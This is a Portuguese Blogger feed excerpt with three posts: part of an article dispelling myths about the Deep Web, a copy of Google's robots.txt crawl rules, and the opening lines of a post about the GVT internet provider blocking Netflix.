<div style="box-sizing: border-box; font-size: 16px; line-height: 1.5; margin-bottom: 25px;">
<img alt="1152x864-dizorb_00395706" src="https://www.fatosdesconhecidos.com.br/wp-content/uploads/2014/10/1152x864-dizorb_00395706-600x450.jpg" /></div>
<div style="box-sizing: border-box; font-size: 16px; line-height: 1.5; margin-bottom: 25px;">
A Deep Web, em si, não é má. Afinal, ela é usada principalmente para o download de séries, filmes, livros, manuais e outros tipos de informação raras, e, no meio disso tudo, muita pornografia e coisas bizarras. Mas em quê, exatamente, isso difere da Internet normal? Na verdade, a Deep Web é apenas uma forma mais avançada de procurar coisas, e se você não é uma pessoa perturbada normalmente, não vai achar nada de perturbador lá.</div>
<div style="box-sizing: border-box; float: none; margin: 0px; text-align: center;">
</div>
<h1 style="box-sizing: border-box; color: inherit; font-family: inherit; font-size: 28px; font-weight: 500; line-height: 40px; margin: 20px 0px 10px;">
3) Vírus</h1>
<div style="box-sizing: border-box; font-size: 16px; line-height: 1.5; margin-bottom: 25px;">
<img alt="produto_52015fd938d88961503365419ac197b3f511b16d352affe7229012" src="https://www.fatosdesconhecidos.com.br/wp-content/uploads/2014/10/produto_52015fd938d88961503365419ac197b3f511b16d352affe7229012-600x337.jpg" /></div>
<div style="box-sizing: border-box; font-size: 16px; line-height: 1.5; margin-bottom: 25px;">
Se você está usando um navegador criptografado e procurando coisas que não devia, que foram feitas para ser escondidas, qual você acha que é a chance de um hacker ter deixado seus “cães de guarda”, os vírus, protegendo suas terras? Altíssima, é claro, mas, mais uma vez, se você não for atrás de conteúdo impróprio, não preencher cadastros duvidosos e não fizer downloads sem se certificar de que a fonte é confiável, a probabilidade de infectar seu PC é baixa, apesar de maior do que na rede comum. E, como dissemos, a Deep Web tem todo tipo de hacker, mas a maior parte dos navegantes são pessoas comuns, apenas curiosas, como eu e você.</div>
<h1 style="box-sizing: border-box; color: inherit; font-family: inherit; font-size: 28px; font-weight: 500; line-height: 40px; margin: 20px 0px 10px;">
4) A Deep Web não é feita para brasileiros</h1>
<div style="box-sizing: border-box; font-size: 16px; line-height: 1.5; margin-bottom: 25px;">
<img alt="931412_270858396384986_2094854883_n" src="https://www.fatosdesconhecidos.com.br/wp-content/uploads/2014/10/931412_270858396384986_2094854883_n-600x239.png" /></div>
<div style="box-sizing: border-box; font-size: 16px; line-height: 1.5; margin-bottom: 25px;">
Bom, a internet também não, já que não tem linguagem oficial. E, como o resto do mundo, se você quiser ter acesso à cultura internacional, vai precisar aprender a ler em inglês, já que não há sites traduzindo o conteúdo, como a Fatos faz com o conteúdo da web comum, por exemplo. Mas quem sabe esse não seja até um incentivo pra você aprender uma linguagem nova, que vai te ajudar inclusive no mercado de trabalho?</div>
<h1 style="box-sizing: border-box; color: inherit; font-family: inherit; font-size: 28px; font-weight: 500; line-height: 40px; margin: 20px 0px 10px;">
5) Acessar a Deep Web é ilegal</h1>
<div style="box-sizing: border-box; font-size: 16px; line-height: 1.5; margin-bottom: 25px;">
<img alt="ibqNP" height="265" src="https://www.fatosdesconhecidos.com.br/wp-content/uploads/2014/10/ibqNP.jpg" width="640" /></div>
<div style="box-sizing: border-box; font-size: 16px; line-height: 1.5; margin-bottom: 25px;">
Com afirmações esdrúxulas, como de que o FBI iria atrás de quem acessa a Deep Web ou que todo o conteúdo disponibilizado lá é ilegal, as pessoas criam tabus e um medo desproporcional com o conteúdo encontrado na rede, que, como dissemos, é muito mais manipulado por você mesmo do que pelos outros. Simplesmente acessar o Google enche sua tela de fotos de crianças peladas, gente morta e monstros? Nem a Deep Web, que funciona exatamente da mesma forma. Portanto, como diria o Capitão Planeta, “o poder é de vocês!”.</div>
<div style="box-sizing: border-box; font-size: 16px; line-height: 1.5; margin-bottom: 25px;">
Assim, se você sempre teve curiosidade, mas muito medo, faça como ensinamos: baixe o TOR, vá atrás de algo que você pesquisaria no Google normal e repare na diferença entre os resultados – pode ser que ela nem seja tão grande assim! E se você veio ler essa matéria querendo é o bizarro, não vamos te deixar na mão: confira aqui algumas coisas bizarras que nossa equipe encontrou por lá – porque estávamos procurando coisas bizarras, que fique claro!</div>
</div>
mrdrawerhttp://www.blogger.com/profile/08233472049860500738noreply@blogger.comtag:blogger.com,1999:blog-4472344379716989945.post-27333236420734994002016-11-18T10:01:00.001-02:002016-11-18T10:02:32.815-02:00Robots - google.com x Robots.txt<pre style="white-space: pre-wrap; word-wrap: break-word;"><img alt="Resultado de imagem para google" src="data:image/jpeg;base64,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" /></pre>
<pre style="white-space: pre-wrap; word-wrap: break-word;">
</pre>
<pre style="white-space: pre-wrap; word-wrap: break-word;">User-agent: *
Disallow: /search
Allow: /search/about
Disallow: /sdch
Disallow: /groups
Disallow: /index.html?
Disallow: /?
Allow: /?hl=
Disallow: /?hl=*&
Allow: /?hl=*&gws_rd=ssl$
Disallow: /?hl=*&*&gws_rd=ssl
Allow: /?gws_rd=ssl$
Allow: /?pt1=true$
Disallow: /imgres
Disallow: /u/
Disallow: /preferences
Disallow: /setprefs
Disallow: /default
Disallow: /m?
Disallow: /m/
Allow: /m/finance
Disallow: /wml?
Disallow: /wml/?
Disallow: /wml/search?
Disallow: /xhtml?
Disallow: /xhtml/?
Disallow: /xhtml/search?
Disallow: /xml?
Disallow: /imode?
Disallow: /imode/?
Disallow: /imode/search?
Disallow: /jsky?
Disallow: /jsky/?
Disallow: /jsky/search?
Disallow: /pda?
Disallow: /pda/?
Disallow: /pda/search?
Disallow: /sprint_xhtml
Disallow: /sprint_wml
Disallow: /pqa
Disallow: /palm
Disallow: /gwt/
Disallow: /purchases
Disallow: /local?
Disallow: /local_url
Disallow: /shihui?
Disallow: /shihui/
Disallow: /products?
Disallow: /product_
Disallow: /products_
Disallow: /products;
Disallow: /print
Disallow: /books/
Disallow: /bkshp?*q=*
Disallow: /books?*q=*
Disallow: /books?*output=*
Disallow: /books?*pg=*
Disallow: /books?*jtp=*
Disallow: /books?*jscmd=*
Disallow: /books?*buy=*
Disallow: /books?*zoom=*
Allow: /books?*q=related:*
Allow: /books?*q=editions:*
Allow: /books?*q=subject:*
Allow: /books/about
Allow: /booksrightsholders
Allow: /books?*zoom=1*
Allow: /books?*zoom=5*
Disallow: /ebooks/
Disallow: /ebooks?*q=*
Disallow: /ebooks?*output=*
Disallow: /ebooks?*pg=*
Disallow: /ebooks?*jscmd=*
Disallow: /ebooks?*buy=*
Disallow: /ebooks?*zoom=*
Allow: /ebooks?*q=related:*
Allow: /ebooks?*q=editions:*
Allow: /ebooks?*q=subject:*
Allow: /ebooks?*zoom=1*
Allow: /ebooks?*zoom=5*
Disallow: /patents?
Disallow: /patents/download/
Disallow: /patents/pdf/
Disallow: /patents/related/
Disallow: /scholar
Disallow: /citations?
Allow: /citations?user=
Disallow: /citations?*cstart=
Allow: /citations?view_op=new_profile
Allow: /citations?view_op=top_venues
Allow: /scholar_share
Disallow: /s?
Allow: /maps?*output=classic*
Allow: /maps?*file=
Allow: /maps/api/js?
Allow: /maps/d/
Disallow: /maps?
Disallow: /mapstt?
Disallow: /mapslt?
Disallow: /maps/stk/
Disallow: /maps/br?
Disallow: /mapabcpoi?
Disallow: /maphp?
Disallow: /mapprint?
Disallow: /maps/api/js/
Disallow: /maps/api/staticmap?
Disallow: /maps/api/streetview
Disallow: /mld?
Disallow: /staticmap?
Disallow: /maps/preview
Disallow: /maps/place
Disallow: /help/maps/streetview/partners/welcome/
Disallow: /help/maps/indoormaps/partners/
Disallow: /lochp?
Disallow: /center
Disallow: /ie?
Disallow: /blogsearch/
Disallow: /blogsearch_feeds
Disallow: /advanced_blog_search
Disallow: /uds/
Disallow: /chart?
Disallow: /transit?
Disallow: /extern_js/
Disallow: /xjs/
Disallow: /calendar/feeds/
Disallow: /calendar/ical/
Disallow: /cl2/feeds/
Disallow: /cl2/ical/
Disallow: /coop/directory
Disallow: /coop/manage
Disallow: /trends?
Disallow: /trends/music?
Disallow: /trends/hottrends?
Disallow: /trends/viz?
Disallow: /trends/embed.js?
Disallow: /trends/fetchComponent?
Disallow: /trends/beta
Disallow: /musica
Disallow: /musicad
Disallow: /musicas
Disallow: /musicl
Disallow: /musics
Disallow: /musicsearch
Disallow: /musicsp
Disallow: /musiclp
Disallow: /urchin_test/
Disallow: /movies?
Disallow: /wapsearch?
Allow: /safebrowsing/diagnostic
Allow: /safebrowsing/report_badware/
Allow: /safebrowsing/report_error/
Allow: /safebrowsing/report_phish/
Disallow: /reviews/search?
Disallow: /orkut/albums
Disallow: /cbk
Allow: /cbk?output=tile&cb_client=maps_sv
Disallow: /maps/api/js/AuthenticationService.Authenticate
Disallow: /maps/api/js/QuotaService.RecordEvent
Disallow: /recharge/dashboard/car
Disallow: /recharge/dashboard/static/
Disallow: /profiles/me
Allow: /profiles
Disallow: /s2/profiles/me
Allow: /s2/profiles
Allow: /s2/oz
Allow: /s2/photos
Allow: /s2/search/social
Allow: /s2/static
Disallow: /s2
Disallow: /transconsole/portal/
Disallow: /gcc/
Disallow: /aclk
Disallow: /cse?
Disallow: /cse/home
Disallow: /cse/panel
Disallow: /cse/manage
Disallow: /tbproxy/
Disallow: /imesync/
Disallow: /shenghuo/search?
Disallow: /support/forum/search?
Disallow: /reviews/polls/
Disallow: /hosted/images/
Disallow: /ppob/?
Disallow: /ppob?
Disallow: /accounts/ClientLogin
Disallow: /accounts/ClientAuth
Disallow: /accounts/o8
Allow: /accounts/o8/id
Disallow: /topicsearch?q=
Disallow: /xfx7/
Disallow: /squared/api
Disallow: /squared/search
Disallow: /squared/table
Disallow: /qnasearch?
Disallow: /app/updates
Disallow: /sidewiki/entry/
Disallow: /quality_form?
Disallow: /labs/popgadget/search
Disallow: /buzz/post
Disallow: /compressiontest/
Disallow: /analytics/reporting/
Disallow: /analytics/admin/
Disallow: /analytics/web/
Disallow: /analytics/feeds/
Disallow: /analytics/settings/
Disallow: /analytics/portal/
Disallow: /analytics/uploads/
Allow: /alerts/manage
Allow: /alerts/remove
Disallow: /alerts/
Allow: /alerts/$
Disallow: /ads/search?
Disallow: /ads/plan/action_plan?
Disallow: /ads/plan/api/
Disallow: /ads/hotels/partners
Disallow: /phone/compare/?
Disallow: /travel/clk
Disallow: /hotelfinder/rpc
Disallow: /hotels/rpc
Disallow: /flights/rpc
Disallow: /commercesearch/services/
Disallow: /evaluation/
Disallow: /chrome/browser/mobile/tour
Disallow: /compare/*/apply*
Disallow: /forms/perks/
Disallow: /shopping/suppliers/search
Disallow: /ct/
Disallow: /edu/cs4hs/
Disallow: /trustedstores/s/
Disallow: /trustedstores/tm2
Disallow: /trustedstores/verify
Disallow: /adwords/proposal
Disallow: /shopping/product/
Disallow: /shopping/seller
Disallow: /shopping/reviewer
Disallow: /about/careers/apply/
Disallow: /about/careers/applications/
Disallow: /landing/signout.html
Disallow: /webmasters/sitemaps/ping?
Disallow: /ping?
Disallow: /gallery/
Disallow: /landing/now/ontap/
Allow: /searchhistory/
# Certain social media sites are whitelisted to allow crawlers to access page markup when links to google.com/imgres* are shared. To learn more, please contact images-robots-whitelist@google.com.
User-agent: Twitterbot
Allow: /imgres
User-agent: facebookexternalhit
Allow: /imgres
Sitemap: http://www.gstatic.com/culturalinstitute/sitemaps/www_google_com_culturalinstitute/sitemap-index.xml
Sitemap: http://www.gstatic.com/earth/gallery/sitemaps/sitemap.xml
Sitemap: http://www.gstatic.com/s2/sitemaps/profiles-sitemap.xml
Sitemap: https://www.google.com/sitemap.xml</pre>
mrdrawerhttp://www.blogger.com/profile/08233472049860500738noreply@blogger.comtag:blogger.com,1999:blog-4472344379716989945.post-84802236876255045742016-11-14T08:25:00.002-02:002016-11-14T08:28:13.181-02:00GVT Bloqueando sua NETFLIX? Não consegue acessar sua NETFLIX e tem GVT?<h3>
<span style="font-family: "trebuchet ms" , sans-serif;">Não se preocupe!</span></h3>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;">Fiz o teste no domingo e funcionou após algumas tentativas para </span><span style="font-family: "trebuchet ms" , sans-serif;">entrar no site da NETFLIX. (Aliás, Pingava o site e recebia 100% dos pacotes)</span></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
